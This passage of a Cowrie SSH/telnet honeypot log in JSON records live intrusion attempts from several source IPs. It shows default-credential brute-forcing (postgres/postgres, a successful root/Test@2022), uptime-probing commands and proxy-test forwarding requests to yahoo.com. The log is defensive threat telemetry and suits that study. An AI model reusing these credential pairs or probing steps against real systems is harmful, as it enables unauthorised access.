{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:10:00.999731Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T09:10:01.005664Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T09:10:01.007442Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T09:10:01.008263Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:10:01.008976Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T09:10:01.009536Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:10:01.010255Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T09:10:01.010886Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T09:10:01.568743Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:10:01.571002Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:10:01.573205Z","src_ip":"196.251.86.249","session":"70f5bcba1369"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57911,"dst_ip":"1.2.3.4","dst_port":23,"session":"adbd31ff574a","protocol":"telnet","message":"New connection: 212.227.235.229:57911 (1.2.3.4:23) [session: adbd31ff574a]","sensor":"my-vps","timestamp":"2025-08-26T09:10:19.056267Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":11084,"dst_ip":"1.2.3.4","dst_port":22,"session":"666b9ddce534","protocol":"ssh","message":"New connection: 213.209.150.239:11084 (1.2.3.4:22) [session: 666b9ddce534]","sensor":"my-vps","timestamp":"2025-08-26T09:10:27.303730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T09:10:27.304706Z","src_ip":"213.209.150.239","session":"666b9ddce534"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T09:10:27.352451Z","src_ip":"213.209.150.239","session":"666b9ddce534"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:10:27.587593Z","src_ip":"213.209.150.239","session":"666b9ddce534"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":10136,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:10136","sensor":"my-vps","timestamp":"2025-08-26T09:10:27.635710Z","session":"666b9ddce534"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T09:10:27.682971Z","src_ip":"213.209.150.239","session":"666b9ddce534"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":20649,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20649","sensor":"my-vps","timestamp":"2025-08-26T09:10:27.817575Z","session":"666b9ddce534"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T09:10:27.864882Z","src_ip":"213.209.150.239","session":"666b9ddce534"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:10:27.912779Z","src_ip":"213.209.150.239","session":"666b9ddce534"}
{"eventid":"cowrie.session.closed","duration":33.69865608215332,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:10:52.754852Z","src_ip":"212.227.235.229","session":"adbd31ff574a"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":50442,"dst_ip":"1.2.3.4","dst_port":22,"session":"116eb1e0dafc","protocol":"ssh","message":"New connection: 196.251.86.249:50442 (1.2.3.4:22) [session: 116eb1e0dafc]","sensor":"my-vps","timestamp":"2025-08-26T09:11:01.779555Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:11:02.378007Z","src_ip":"196.251.86.249","session":"116eb1e0dafc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:11:02.378728Z","src_ip":"196.251.86.249","session":"116eb1e0dafc"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres","message":"login attempt [postgres/postgres] failed","sensor":"my-vps","timestamp":"2025-08-26T09:11:04.596052Z","src_ip":"196.251.86.249","session":"116eb1e0dafc"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:11:06.185858Z","src_ip":"196.251.86.249","session":"116eb1e0dafc"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":53590,"dst_ip":"1.2.3.4","dst_port":22,"session":"878c4f26d853","protocol":"ssh","message":"New connection: 196.251.86.249:53590 (1.2.3.4:22) [session: 878c4f26d853]","sensor":"my-vps","timestamp":"2025-08-26T09:12:07.987316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:12:08.657411Z","src_ip":"196.251.86.249","session":"878c4f26d853"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:12:08.658272Z","src_ip":"196.251.86.249","session":"878c4f26d853"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"oracle","message":"login attempt [oracle/oracle] failed","sensor":"my-vps","timestamp":"2025-08-26T09:12:10.700640Z","src_ip":"196.251.86.249","session":"878c4f26d853"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:12:12.423740Z","src_ip":"196.251.86.249","session":"878c4f26d853"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":56986,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff7f45ea095e","protocol":"ssh","message":"New connection: 196.251.86.249:56986 (1.2.3.4:22) [session: ff7f45ea095e]","sensor":"my-vps","timestamp":"2025-08-26T09:13:15.811273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:13:16.054925Z","src_ip":"196.251.86.249","session":"ff7f45ea095e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:13:16.055717Z","src_ip":"196.251.86.249","session":"ff7f45ea095e"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T09:13:17.473185Z","src_ip":"196.251.86.249","session":"ff7f45ea095e"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:13:19.207781Z","src_ip":"196.251.86.249","session":"ff7f45ea095e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59522,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ec86cc2baeb","protocol":"ssh","message":"New connection: 217.72.205.35:59522 (1.2.3.4:22) [session: 2ec86cc2baeb]","sensor":"my-vps","timestamp":"2025-08-26T09:14:19.016507Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:14:19.017628Z","src_ip":"217.72.205.35","session":"2ec86cc2baeb"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":60574,"dst_ip":"1.2.3.4","dst_port":22,"session":"314155c65a4f","protocol":"ssh","message":"New connection: 196.251.86.249:60574 (1.2.3.4:22) [session: 314155c65a4f]","sensor":"my-vps","timestamp":"2025-08-26T09:14:23.097629Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:14:23.430817Z","src_ip":"196.251.86.249","session":"314155c65a4f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:14:23.432486Z","src_ip":"196.251.86.249","session":"314155c65a4f"}
{"eventid":"cowrie.login.failed","username":"wpyan","password":"wpyan","message":"login attempt [wpyan/wpyan] failed","sensor":"my-vps","timestamp":"2025-08-26T09:14:24.814590Z","src_ip":"196.251.86.249","session":"314155c65a4f"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:14:26.465399Z","src_ip":"196.251.86.249","session":"314155c65a4f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45728,"dst_ip":"1.2.3.4","dst_port":22,"session":"04610070d75a","protocol":"ssh","message":"New connection: 212.227.125.160:45728 (1.2.3.4:22) [session: 04610070d75a]","sensor":"my-vps","timestamp":"2025-08-26T09:14:35.532404Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_2.11.0","message":"Remote SSH version: SSH-2.0-paramiko_2.11.0","sensor":"my-vps","timestamp":"2025-08-26T09:14:35.533378Z","src_ip":"212.227.125.160","session":"04610070d75a"}
{"eventid":"cowrie.client.kex","hassh":"a704be057881f0b1d623cd263e477a8b","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-md5,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-rsa","ssh-dss","ecdsa-sha2-nistp256","ssh-ed25519","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-md5","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a704be057881f0b1d623cd263e477a8b","sensor":"my-vps","timestamp":"2025-08-26T09:14:35.772929Z","src_ip":"212.227.125.160","session":"04610070d75a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:14:36.147046Z","src_ip":"212.227.125.160","session":"04610070d75a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46502,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0e4e79cc827","protocol":"ssh","message":"New connection: 212.227.125.160:46502 (1.2.3.4:22) [session: d0e4e79cc827]","sensor":"my-vps","timestamp":"2025-08-26T09:14:36.324511Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_2.11.0","message":"Remote SSH version: SSH-2.0-paramiko_2.11.0","sensor":"my-vps","timestamp":"2025-08-26T09:14:36.325504Z","src_ip":"212.227.125.160","session":"d0e4e79cc827"}
{"eventid":"cowrie.client.kex","hassh":"a704be057881f0b1d623cd263e477a8b","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-md5,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-md5","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a704be057881f0b1d623cd263e477a8b","sensor":"my-vps","timestamp":"2025-08-26T09:14:36.495806Z","src_ip":"212.227.125.160","session":"d0e4e79cc827"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:14:36.497229Z","src_ip":"212.227.125.160","session":"d0e4e79cc827"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":60988,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e5bbe691c07","protocol":"ssh","message":"New connection: 139.19.117.131:60988 (1.2.3.4:22) [session: 4e5bbe691c07]","sensor":"my-vps","timestamp":"2025-08-26T09:14:43.187675Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:14:43.189175Z","src_ip":"139.19.117.131","session":"4e5bbe691c07"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecds